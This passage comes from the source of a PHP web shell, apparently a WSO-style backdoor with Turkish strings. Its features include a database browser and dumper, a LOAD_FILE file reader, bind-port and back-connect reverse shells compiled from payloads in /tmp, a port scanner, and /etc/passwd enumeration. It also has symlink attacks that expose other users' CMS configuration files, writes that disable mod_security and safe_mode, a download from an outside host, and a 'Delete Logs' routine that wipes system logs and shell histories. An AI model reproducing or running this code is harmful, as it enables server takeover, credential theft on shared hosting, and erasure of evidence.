(\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> \r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> (".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \' \r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." |<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf /var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya aç\r\nı\r\nlamadı\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = 